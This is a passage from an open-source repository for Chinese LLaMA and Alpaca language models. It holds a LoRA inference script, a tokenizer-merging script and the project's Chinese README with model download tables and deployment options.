LlamaForCausalLM, LlamaTokenizer from peft import PeftModel from patches import apply_attention_patch, apply_ntk_scaling_patch apply_attention_patch(use_memory_efficient_attention=True) apply_ntk_scaling_patch(args.alpha) generation_config = dict( temperature=0.2, top_k=40, top_p=0.9, do_sample=True, num_beams=1, repetition_penalty=1.1, max_new_tokens=400 ) # The prompt template below is taken from llama.cpp # and is slightly different from the one used in training. # But we find it gives better results prompt_input = ( "Below is an instruction that describes a task. 
" "Write a response that appropriately completes the request.\n\n" "### Instruction:\n\n{instruction}\n\n### Response:\n\n" ) sample_data = ["为什么要减少污染,保护环境?"] def generate_prompt(instruction, input=None): if input: instruction = instruction + '\n' + input return prompt_input.format_map({'instruction': instruction}) if __name__ == '__main__': load_type = torch.float16 if torch.cuda.is_available(): device = torch.device(0) else: device = torch.device('cpu') if args.tokenizer_path is None: args.tokenizer_path = args.lora_model if args.lora_model is None: args.tokenizer_path = args.base_model tokenizer = LlamaTokenizer.from_pretrained(args.tokenizer_path) base_model = LlamaForCausalLM.from_pretrained( args.base_model, load_in_8bit=args.load_in_8bit, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto', ) model_vocab_size = base_model.get_input_embeddings().weight.size(0) tokenzier_vocab_size = len(tokenizer) print(f"Vocab of the base model: {model_vocab_size}") print(f"Vocab of the tokenizer: {tokenzier_vocab_size}") if model_vocab_size!=tokenzier_vocab_size: assert tokenzier_vocab_size > model_vocab_size print("Resize model embeddings to fit tokenizer") base_model.resize_token_embeddings(tokenzier_vocab_size) if args.lora_model is not None: print("loading peft model") model = PeftModel.from_pretrained(base_model, args.lora_model,torch_dtype=load_type,device_map='auto',) else: model = base_model if device==torch.device('cpu'): model.float() # test data if args.data_file is None: examples = sample_data else: with open(args.data_file,'r') as f: examples = [l.strip() for l in f.readlines()] print("first 10 examples:") for example in examples[:10]: print(example) model.eval() with torch.no_grad(): if args.interactive: print("Start inference with instruction mode.") print('='*85) print("+ 该模式下仅支持单轮问答,无多轮对话能力。\n" "+ 如要进行多轮对话,请使用llama.cpp或llamachat工具。") print('-'*85) print("+ This mode only supports single-turn QA.\n" "+ If you want to experience multi-turn dialogue, please use llama.cpp or llamachat.") print('='*85) while True: raw_input_text = input("Input:") if len(raw_input_text.strip())==0: break if args.with_prompt: input_text = generate_prompt(instruction=raw_input_text) else: input_text = raw_input_text inputs = tokenizer(input_text,return_tensors="pt") #add_special_tokens=False ? generation_output = model.generate( input_ids = inputs["input_ids"].to(device), attention_mask = inputs['attention_mask'].to(device), eos_token_id=tokenizer.eos_token_id, pad_token_id=tokenizer.pad_token_id, **generation_config ) s = generation_output[0] output = tokenizer.decode(s,skip_special_tokens=True) if args.with_prompt: response = output.split("### Response:")[1].strip() else: response = output print("Response: ",response) print("\n") else: print("Start inference.") results = [] for index, example in enumerate(examples): if args.with_prompt is True: input_text = generate_prompt(instruction=example) else: input_text = example inputs = tokenizer(input_text,return_tensors="pt") #add_special_tokens=False ? 
generation_output = model.generate( input_ids = inputs["input_ids"].to(device), attention_mask = inputs['attention_mask'].to(device), eos_token_id=tokenizer.eos_token_id, pad_token_id=tokenizer.pad_token_id, **generation_config ) s = generation_output[0] output = tokenizer.decode(s,skip_special_tokens=True) if args.with_prompt: response = output.split("### Response:")[1].strip() else: response = output print(f"======={index}=======") print(f"Input: {example}\n") print(f"Output: {response}\n") results.append({"Input":input_text,"Output":response}) dirname = os.path.dirname(args.predictions_file) os.makedirs(dirname,exist_ok=True) with open(args.predictions_file,'w') as f: json.dump(results,f,ensure_ascii=False,indent=2) with open(dirname+'/generation_config.json','w') as f: json.dump(generation_config,f,ensure_ascii=False,indent=2) File: scripts/merge_tokenizer/merge_tokenizers.py import os os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"]="python" from transformers import LlamaTokenizer from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model import sentencepiece as spm import argparse parser = argparse.ArgumentParser() parser.add_argument('--llama_tokenizer_dir', default=None, type=str, required=True) parser.add_argument('--chinese_sp_model_file', default='./chinese_sp.model', type=str) args = parser.parse_args() llama_tokenizer_dir = args.llama_tokenizer_dir chinese_sp_model_file = args.chinese_sp_model_file # load llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir) chinese_sp_model = spm.SentencePieceProcessor() chinese_sp_model.Load(chinese_sp_model_file) llama_spm = sp_pb2_model.ModelProto() llama_spm.ParseFromString(llama_tokenizer.sp_model.serialized_model_proto()) chinese_spm = sp_pb2_model.ModelProto() chinese_spm.ParseFromString(chinese_sp_model.serialized_model_proto()) # print number of tokens print(len(llama_tokenizer),len(chinese_sp_model)) print(llama_tokenizer.all_special_tokens) print(llama_tokenizer.all_special_ids) print(llama_tokenizer.special_tokens_map) ## Add Chinese tokens to LLaMA tokenizer llama_spm_tokens_set=set(p.piece for p in llama_spm.pieces) print(len(llama_spm_tokens_set)) print(f"Before:{len(llama_spm_tokens_set)}") for p in chinese_spm.pieces: piece = p.piece if piece not in llama_spm_tokens_set: new_p = sp_pb2_model.ModelProto().SentencePiece() new_p.piece = piece new_p.score = 0 llama_spm.pieces.append(new_p) print(f"New model pieces: {len(llama_spm.pieces)}") ## Save output_sp_dir = 'merged_tokenizer_sp' output_hf_dir = 'merged_tokenizer_hf' # the path to save Chinese-LLaMA tokenizer os.makedirs(output_sp_dir,exist_ok=True) with open(output_sp_dir+'/chinese_llama.model', 'wb') as f: f.write(llama_spm.SerializeToString()) tokenizer = LlamaTokenizer(vocab_file=output_sp_dir+'/chinese_llama.model') tokenizer.save_pretrained(output_hf_dir) print(f"Chinese-LLaMA tokenizer has been saved to {output_hf_dir}") # Test llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir) chinese_llama_tokenizer = LlamaTokenizer.from_pretrained(output_hf_dir) print(tokenizer.all_special_tokens) print(tokenizer.all_special_ids) print(tokenizer.special_tokens_map) text='''白日依山尽,黄河入海流。欲穷千里目,更上一层楼。 The primary use of LLaMA is research on large language models, including''' print("Test text:\n",text) print(f"Tokenized by LLaMA tokenizer:{llama_tokenizer.tokenize(text)}") print(f"Tokenized by Chinese-LLaMA tokenizer:{chinese_llama_tokenizer.tokenize(text)}")
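# Example invocation of this merging script (a sketch; paths are placeholders):
#   python merge_tokenizers.py \
#     --llama_tokenizer_dir /path/to/original/llama-7b \
#     --chinese_sp_model_file ./chinese_sp.model
# The merged SentencePiece model is saved to merged_tokenizer_sp/chinese_llama.model and
# the Hugging Face tokenizer to merged_tokenizer_hf/, as printed above.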
# [Chinese-LLaMA-Alpaca-3](https://github.com/ymcui/Chinese-LLaMA-Alpaca-3)项目启动! [**🇨🇳中文**](./README.md) | [**🌐English**](./README_EN.md) | [**📖文档/Docs**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki) | [**❓提问/Issues**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/issues) | [**💬讨论/Discussions**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions) | [**⚔️竞技场/Arena**](http://llm-arena.ymcui.com/) <p align="center"> <br> <img src="./pics/banner.png" width="700"/> <br> </p> <p align="center"> <img alt="GitHub" src="https://img.shields.io/github/license/ymcui/Chinese-LLaMA-Alpaca.svg?color=blue&style=flat-square"> <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/ymcui/Chinese-LLaMA-Alpaca"> <img alt="GitHub top language" src="https://img.shields.io/github/languages/top/ymcui/Chinese-LLaMA-Alpaca"> <img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/ymcui/Chinese-LLaMA-Alpaca"> <a href="https://app.codacy.com/gh/ymcui/Chinese-LLaMA-Alpaca/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade"><img src="https://app.codacy.com/project/badge/Grade/1710faac5e634acaabfc26b0a778cdde"/></a> </p> 本项目开源了**中文LLaMA模型和指令精调的Alpaca大模型**,以进一步促进大模型在中文NLP社区的开放研究。这些模型**在原版LLaMA的基础上扩充了中文词表**并使用了中文数据进行二次预训练,进一步提升了中文基础语义理解能力。同时,中文Alpaca模型进一步使用了中文指令数据进行精调,显著提升了模型对指令的理解和执行能力。 **技术报告(V2)**:[[Cui, Yang, and Yao] Efficient and Effective Text Encoding for Chinese LLaMA and Alpaca](https://arxiv.org/abs/2304.08177) **本项目主要内容:** - 🚀 针对原版LLaMA模型扩充了中文词表,提升了中文编解码效率 - 🚀 开源了使用中文文本数据预训练的中文LLaMA以及经过指令精调的中文Alpaca - 🚀 开源了预训练脚本、指令精调脚本,用户可根据需要进一步训练模型 - 🚀 快速使用笔记本电脑(个人PC)的CPU/GPU本地量化和部署体验大模型 - 🚀 支持[🤗transformers](https://github.com/huggingface/transformers), [llama.cpp](https://github.com/ggerganov/llama.cpp), [text-generation-webui](https://github.com/oobabooga/text-generation-webui), [LlamaChat](https://github.com/alexrozanski/LlamaChat), [LangChain](https://github.com/hwchase17/langchain), [privateGPT](https://github.com/imartinez/privateGPT)等生态 - 目前已开源的模型版本:7B(基础版、**Plus版**、**Pro版**)、13B(基础版、**Plus版**、**Pro版**)、33B(基础版、**Plus版**、**Pro版**) 💡 下图是中文Alpaca-Plus-7B模型在本地CPU量化部署后的实际体验速度和效果。 ![](./pics/screencast.gif) ---- [**中文LLaMA-2&Alpaca-2大模型**](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2) | [多模态中文LLaMA&Alpaca大模型](https://github.com/airaria/Visual-Chinese-LLaMA-Alpaca) | [多模态VLE](https://github.com/iflytek/VLE) | [中文MiniRBT](https://github.com/iflytek/MiniRBT) | [中文LERT](https://github.com/ymcui/LERT) | [中英文PERT](https://github.com/ymcui/PERT) | [中文MacBERT](https://github.com/ymcui/MacBERT) | [中文ELECTRA](https://github.com/ymcui/Chinese-ELECTRA) | [中文XLNet](https://github.com/ymcui/Chinese-XLNet) | [中文BERT](https://github.com/ymcui/Chinese-BERT-wwm) | [知识蒸馏工具TextBrewer](https://github.com/airaria/TextBrewer) | [模型裁剪工具TextPruner](https://github.com/airaria/TextPruner) ## 新闻 **[2024/04/30] Chinese-LLaMA-Alpaca-3 已正式发布,开源基于Llama-3的Llama-3-Chinese-8B和Llama-3-Chinese-8B-Instruct,推荐所有一期、二期项目用户升级至三代模型,请参阅:https://github.com/ymcui/Chinese-LLaMA-Alpaca-3** [2024/03/27] 本项目已入驻机器之心SOTA!模型平台,欢迎关注:https://sota.jiqizhixin.com/project/chinese-llama-alpaca [2023/08/14] Chinese-LLaMA-Alpaca-2 v2.0版本已正式发布,开源Chinese-LLaMA-2-13B和Chinese-Alpaca-2-13B,推荐所有一期用户升级至二代模型,请参阅:https://github.com/ymcui/Chinese-LLaMA-Alpaca-2 [2023/07/31] Chinese-LLaMA-Alpaca-2 v1.0版本已正式发布,请参阅:https://github.com/ymcui/Chinese-LLaMA-Alpaca-2 [2023/07/19] [v5.0版本](https://github.com/ymcui/Chinese-LLaMA-Alpaca/releases/tag/v5.0): 发布Alpaca-Pro系列模型,显著提升回复长度和质量;同时发布Plus-33B系列模型。 
[2023/07/19] 🚀启动[中文LLaMA-2、Alpaca-2开源大模型项目](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2),欢迎关注了解最新信息。 [2023/07/10] Beta测试预览,提前了解即将到来的更新:详见[讨论区](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions/732) [2023/07/07] Chinese-LLaMA-Alpaca家族再添新成员,推出面向视觉问答与对话的[多模态中文LLaMA&Alpaca大模型](https://github.com/airaria/Visual-Chinese-LLaMA-Alpaca),发布了7B测试版本。 [2023/06/30] llama.cpp下8K context支持(无需对模型做出修改),相关方法和讨论见[讨论区](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions/696);transformers下支持4K+ context的代码请参考[PR#705](https://github.com/ymcui/Chinese-LLaMA-Alpaca/pull/705) [2023/06/16] [v4.1版本](https://github.com/ymcui/Chinese-LLaMA-Alpaca/releases/tag/v4.1): 发布新版技术报告、添加C-Eval解码脚本、添加低资源模型合并脚本等。 [2023/06/08] [v4.0版本](https://github.com/ymcui/Chinese-LLaMA-Alpaca/releases/tag/v4.0): 发布中文LLaMA/Alpaca-33B、添加privateGPT使用示例、添加C-Eval结果等。 ## 内容导引 | 章节 | 描述 | | ------------------------------------- | ------------------------------------------------------------ | | [⏬模型下载](#模型下载) | 中文LLaMA、Alpaca大模型下载地址 | | [🈴合并模型](#合并模型) | (重要)介绍如何将下载的LoRA模型与原版LLaMA合并 | | [💻本地推理与快速部署](#本地推理与快速部署) | 介绍了如何对模型进行量化并使用个人电脑部署并体验大模型 | | [💯系统效果](#系统效果) | 介绍了部分场景和任务下的使用体验效果 | | [📝训练细节](#训练细节) | 介绍了中文LLaMA、Alpaca大模型的训练细节 | | [❓FAQ](#FAQ) | 一些常见问题的回复 | | [⚠️局限性](#局限性) | 本项目涉及模型的局限性 | ## 模型下载 ### 用户须知(必读) Facebook官方发布的[LLaMA模型禁止商用](https://github.com/facebookresearch/llama),并且官方没有正式开源模型权重(虽然网上已经有很多第三方的下载地址)。为了遵循相应的许可,**这里发布的是LoRA权重**,可以理解为原LLaMA模型上的一个“补丁”,两者合并即可获得完整版权重。以下中文LLaMA/Alpaca LoRA模型无法单独使用,需要搭配[原版LLaMA模型](https://github.com/facebookresearch/llama)。请参考本项目给出的[合并模型](#合并模型)步骤重构模型。 ### 模型列表 下图展示了本项目以及[二期项目](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2)推出的所有大模型之间的关系。 ![](./pics/models.png) ### 模型选择指引 下面是中文LLaMA和Alpaca模型的基本对比以及建议使用场景(包括但不限于),更多内容见[训练细节](#训练细节)。 | 对比项 | 中文LLaMA | 中文Alpaca | | :-------------------- | ------------------------------------------------------ | ------------------------------------------------------------ | | 训练方式 | 传统CLM | 指令精调 | | 模型类型 | 基座模型 | 指令理解模型(类ChatGPT) | | 训练语料 | 无标注通用语料 | 有标注指令数据 | | 词表大小<sup>[3]</sup> | 4995**3** | 4995**4**=49953+1(pad token) | | 输入模板 | 不需要 | 需要符合模板要求<sup>[1]</sup> | | 适用场景 ✔️ | 文本续写:给定上文内容,让模型生成下文 | 指令理解(问答、写作、建议等);多轮上下文理解(聊天等) | | 不适用场景 ❌ | 指令理解 、多轮聊天等 | 文本无限制自由生成 | | llama.cpp | 使用`-p`参数指定上文 | 使用`-ins`参数启动指令理解+聊天模式 | | text-generation-webui | 不适合chat模式 | 使用`--cpu`可在无显卡形式下运行 | | LlamaChat | 加载模型时选择"LLaMA" | 加载模型时选择"Alpaca" | | [HF推理代码](./scripts/inference/inference_hf.py) | 无需添加额外启动参数 | 启动时添加参数 `--with_prompt` | | [web-demo代码](./scripts/inference/gradio_demo.py) | 不适用 | 直接提供Alpaca模型位置即可;支持多轮对话 | | [LangChain示例](./scripts/langchain) / privateGPT | 不适用 | 直接提供Alpaca模型位置即可 | | 已知问题 | 如果不控制终止,则会一直写下去,直到达到输出长度上限。<sup>[2]</sup> | 请使用Pro版,以避免Plus版回复过短的问题。 | *[1] llama.cpp/LlamaChat/[HF推理代码](./scripts/inference/inference_hf.py)/[web-demo代码](./scripts/inference/gradio_demo.py)/[LangChain示例](./scripts/langchain)等已内嵌,无需手动添加模板。*<br/> *[2] 如果出现模型回答质量特别低、胡言乱语、不理解问题等情况,请检查是否使用了正确的模型和启动参数。*<br/> *[3] 经过指令精调的Alpaca会比LLaMA多一个pad token,**因此请勿混用LLaMA/Alpaca词表**。* ### 推荐模型下载 以下为本项目推荐使用的模型列表,通常使用了更多的训练数据和优化的模型训练方法和参数,请优先使用这些模型(其余模型请查看[其他模型](#其他模型))。**如希望体验类ChatGPT对话交互,请使用Alpaca模型,而不是LLaMA模型。** 对于Alpaca模型,Pro版针对回复内容过短的问题进行改进,模型回复效果有明显提升;如果更偏好短回复,请选择Plus系列。 | 模型名称 | 类型 | 训练数据 | 重构模型<sup>[1]</sup> | 大小<sup>[2]</sup> | LoRA下载<sup>[3]</sup> | | :------------------------ | :------: | :------: | :--------------------------------------------------------: | :----------------: | :----------------------------------------------------------: | | Chinese-LLaMA-Plus-7B | 基座模型 | 通用120G | 原版LLaMA-7B | 790M | 
[[百度]](https://pan.baidu.com/s/1zvyX9FN-WSRDdrtMARxxfw?pwd=2gtr) [[Google]](https://drive.google.com/file/d/1N97m3rBj-rp-J1X8rgRfluyomEscfAq0/view?usp=sharing) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-plus-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-plus-lora-7b) | | Chinese-LLaMA-Plus-13B | 基座模型 | 通用120G | 原版LLaMA-13B | 1.0G | [[百度]](https://pan.baidu.com/s/1VGpNlrLx5zHuNzLOcTG-xw?pwd=8cvd) [[Google]](https://drive.google.com/file/d/1q0L5Me_1j_9iiRRNfuEFUt3SOjQo3-g3/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-plus-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-plus-lora-13b)| | Chinese-LLaMA-Plus-33B 🆕 | 基座模型 | 通用120G | 原版LLaMA-33B | 1.3G<sup>[6]</sup> | [[百度]](https://pan.baidu.com/s/1v2WsSA0RFyVfy7FXY9A2NA?pwd=n8ws) [[Google]](https://drive.google.com/file/d/1S4pBPiIZo7fXqf8hjnFaeE7Z-yZFEta9/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-plus-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-plus-lora-33b)| | Chinese-Alpaca-Pro-7B 🆕 | 指令模型 | 指令4.3M | *原版LLaMA-7B &<br/>LLaMA-Plus-7B*<sup>[4]</sup> | 1.1G | [[百度]](https://pan.baidu.com/s/1M7whRwG5DRRkzRXCH4aF3g?pwd=fqpd) [[Google]](https://drive.google.com/file/d/1yfIJ2IXymaTaJ8l7VMnb5LnvQFx3idh-/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-pro-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-pro-lora-7b) | | Chinese-Alpaca-Pro-13B 🆕 | 指令模型 | 指令4.3M | *原版LLaMA-13B &<br/>LLaMA-Plus-13B<sup>[4]</sup>* | 1.3G | [[百度]](https://pan.baidu.com/s/1ok5Iiou-MovZa7bFLvt4uA?pwd=m79g) [[Google]](https://drive.google.com/file/d/1IY8PzMje1LM2bIgnniArnmmE8qYaJV_I/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-pro-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-pro-lora-13b)| | Chinese-Alpaca-Pro-33B 🆕 | 指令模型 | 指令4.3M | *原版LLaMA-33B &<br/>LLaMA-Plus-33B<sup>[4]</sup>* | 2.1G | [[百度]](https://pan.baidu.com/s/1u2TWZcsG_PZSTnmuu7vwww?pwd=8zj8) [[Google]](https://drive.google.com/file/d/14sFEhRq9c-p8S_TiVYNBnmPr4hk-nhs-/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-pro-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-pro-lora-33b)| *[1] 重构需要原版LLaMA模型,[去LLaMA项目申请使用](https://github.com/facebookresearch/llama)或参考这个[PR](https://github.com/facebookresearch/llama/pull/73/files)。因版权问题本项目无法提供下载链接。*<br/> *[2] 经过重构后的模型大小比同等量级的原版LLaMA大一些(主要因为扩充了词表)。*<br/> *[3] 下载后务必检查压缩包中模型文件的SHA256是否一致,请查看[SHA256.md](./SHA256.md)。*<br/> *[4] Alpaca-Plus模型需要同时下载对应的LLaMA-Plus模型,请参考[合并教程](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/手动模型合并与转换#多lora权重合并适用于chinese-alpaca-plus)。*<br/> *[5] 有些地方称为30B,实际上是Facebook在发布模型时写错了,论文里仍然写的是33B。*<br/>*[6] 采用FP16存储,故模型体积较小。* 压缩包内文件目录如下(以Chinese-LLaMA-7B为例): ``` chinese_llama_lora_7b/ - adapter_config.json # LoRA权重配置文件 - adapter_model.bin # LoRA权重文件 - special_tokens_map.json # special_tokens_map文件 - tokenizer_config.json # tokenizer配置文件 - tokenizer.model # tokenizer文件 ``` ### 其他模型下载 由于训练方式和训练数据等因素影响,**以下模型已不再推荐使用(特定场景下可能仍然有用)**,请优先使用上一节中的[推荐模型](#推荐下载模型)。 | 模型名称 | 类型 | 训练数据 | 重构模型 | 大小 | LoRA下载 | | :---------------- | :------: | :------: | :--------------------: | :----------------: | :----------------------------------------------------------: | | Chinese-LLaMA-7B | 基座模型 | 通用20G | 原版LLaMA-7B | 770M | 
[[百度]](https://pan.baidu.com/s/1oORTdpr2TvlkxjpyWtb5Sw?pwd=33hb) [[Google]](https://drive.google.com/file/d/1iQp9T-BHjBjIrFWXq_kIm_cyNmpvv5WN/view?usp=sharing)<br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-lora-7b) | | Chinese-LLaMA-13B | 基座模型 | 通用20G | 原版LLaMA-13B | 1.0G | [[百度]](https://pan.baidu.com/s/1BxFhYhDMipW7LwI58cGmQQ?pwd=ef3t) [[Google]](https://drive.google.com/file/d/12q9EH4mfKRnoKlbkkhzv1xDwWnroo9VS/view?usp=sharing) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-lora-13b) | | Chinese-LLaMA-33B | 基座模型 | 通用20G | 原版LLaMA-33B | 2.7G | [[百度]](https://pan.baidu.com/s/1-ylGyeM70QZ5vbEug5RD-A?pwd=hp6f) [[Google]](https://drive.google.com/file/d/1NwsLYbuEByUxre5GqTN5EkxiuZSRxUy_/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-lora-33b)| | Chinese-Alpaca-7B | 指令模型 | 指令2M | 原版LLaMA-7B | 790M | [[百度]](https://pan.baidu.com/s/1xV1UXjh1EPrPtXg6WyG7XQ?pwd=923e) [[Google]](https://drive.google.com/file/d/1JvFhBpekYiueWiUL3AF1TtaWDb3clY5D/view?usp=sharing) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-lora-7b) | | Chinese-Alpaca-13B | 指令模型 | 指令3M | 原版LLaMA-13B | 1.1G | [[百度]](https://pan.baidu.com/s/1wYoSF58SnU9k0Lndd5VEYg?pwd=mm8i) [[Google]](https://drive.google.com/file/d/1gzMc0xMCpXsXmU1uxFlgQ8VRnWNtDjD8/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-lora-13b)| | Chinese-Alpaca-33B | 指令模型 | 指令4.3M | 原版LLaMA-33B | 2.8G | [[百度]](https://pan.baidu.com/s/1fey7lGMMw3GT982l8uJYMg?pwd=2f2s) [[Google]](https://drive.google.com/file/d/1YeSgnZWaRkKdmYa-JHiIlcvqhrDd4-Y4/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-lora-33b) | | Chinese-Alpaca-Plus-7B | 指令模型 | 指令4M | *原版LLaMA-7B &<br/>LLaMA-Plus-7B* | 1.1G | [[百度]](https://pan.baidu.com/s/12tjjxmDWwLBM8Tj_7FAjHg?pwd=32hc) [[Google]](https://drive.google.com/file/d/1EDcTmq6tDmRxqarpapdyDGBE9opY0zrB/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-plus-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-plus-lora-7b) | | Chinese-Alpaca-Plus-13B | 指令模型 | 指令4.3M | *原版LLaMA-13B &<br/>LLaMA-Plus-13B* | 1.3G | [[百度]](https://pan.baidu.com/s/1Mew4EjBlejWBBB6_WW6vig?pwd=mf5w) [[Google]](https://drive.google.com/file/d/1CcLJvY7XsFAOjfSIqCpDI7jf3EEPDcEF/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-plus-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-plus-lora-13b)| | Chinese-Alpaca-Plus-33B | 指令模型 | 指令4.3M | *原版LLaMA-33B &<br/>LLaMA-Plus-33B* | 2.1G | [[百度]](https://pan.baidu.com/s/1j2prOjiQGB8S5x67Uj8XZw?pwd=3pac) [[Google]](https://drive.google.com/file/d/1YUaT-NOReoF-z1vzj2khwYKdj4Z_ekbO/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-plus-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-plus-lora-33b)| ### 🤗transformers调用 可以在🤗Model 
Hub下载以上所有模型,并且使用[transformers](https://github.com/huggingface/transformers)和[PEFT](https://github.com/huggingface/peft)调用中文LLaMA或Alpaca LoRA模型。以下模型调用名称指的是使用`.from_pretrained()`中指定的模型名称。 详细清单与模型下载地址:https://huggingface.co/hfl ## 合并模型 前面提到LoRA模型无法单独使用,必须与原版LLaMA进行合并才能转为完整模型,以便进行模型推理、量化或者进一步训练。请选择以下方法对模型进行转换合并。 | 方式 | 适用场景 | 教程 | | :----------- | :--------------------------------------------------------- | :----------------------------------------------------------: | | **在线转换** | Colab用户可利用本项目提供的notebook进行在线转换并量化模型 | [链接](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/在线模型合并与转换) | | **手动转换** | 离线方式转换,生成不同格式的模型,以便进行量化或进一步精调 | [链接](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/手动模型合并与转换) | 以下是合并模型后,FP16精度和4-bit量化后的大小,转换前确保本机有足够的内存和磁盘空间(最低要求): | 模型版本 | 7B | 13B | 33B | 65B | | :------------------ | :----: | :-----: | :-----: | :-----: | | 原模型大小(FP16) | 13 GB | 24 GB | 60 GB | 120 GB | | 量化后大小(8-bit) | 7.8 GB | 14.9 GB | 32.4 GB | ~60 GB | | 量化后大小(4-bit) | 3.9 GB | 7.8 GB | 17.2 GB | 38.5 GB | 具体内容请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/模型合并与转换) ## 本地推理与快速部署 本项目中的模型主要支持以下量化、推理和部署方式。 | 推理和部署方式 | 特点 | 平台 | CPU | GPU | 量化加载 | 图形界面 | 教程 | | :----------------------------------------------------------- | -------------------------------------------- | :---: | :--: | :--: | :------: | :------: | :----------------------------------------------------------: | | [**llama.cpp**](https://github.com/ggerganov/llama.cpp) | 丰富的量化选项和高效本地推理 | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/llama.cpp量化部署) | | [**🤗Transformers**](https://github.com/huggingface/transformers) | 原生transformers推理接口 | 通用 | ✅ | ✅ | ✅ | ✅ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用Transformers推理) | | [**text-generation-webui**](https://github.com/oobabooga/text-generation-webui) | 前端Web UI界面的部署方式 | 通用 | ✅ | ✅ | ✅ | ✅ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用text-generation-webui搭建界面) | | [**LlamaChat**](https://github.com/alexrozanski/LlamaChat) | macOS下的图形交互界面 | MacOS | ✅ | ❌ | ✅ | ✅ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用LlamaChat图形界面(macOS)) | | [**LangChain**](https://github.com/hwchase17/langchain) | LLM应用开发框架,适用于进行二次开发 | 通用 | ✅<sup>†</sup> | ✅ | ✅<sup>†</sup> | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/与LangChain进行集成) | | [**privateGPT**](https://github.com/imartinez/privateGPT) | 基于LangChain的多文档本地问答框架 | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用privateGPT进行多文档问答) | | [**Colab Gradio Demo**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/blob/main/notebooks/gradio_web_demo.ipynb) | Colab中启动基于Gradio的交互式Web服务 | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://colab.research.google.com/github/ymcui/Chinese-LLaMA-Alpaca/blob/main/notebooks/gradio_web_demo.ipynb) | | [**API调用**](https://platform.openai.com/docs/api-reference) | 仿OpenAI API接口的服务器Demo | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/API调用) | <sup>†</sup>: LangChain框架支持,但教程中未实现;详细说明请参考LangChain官方文档。 具体内容请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/模型推理与部署) ## 系统效果 ### 生成效果评测 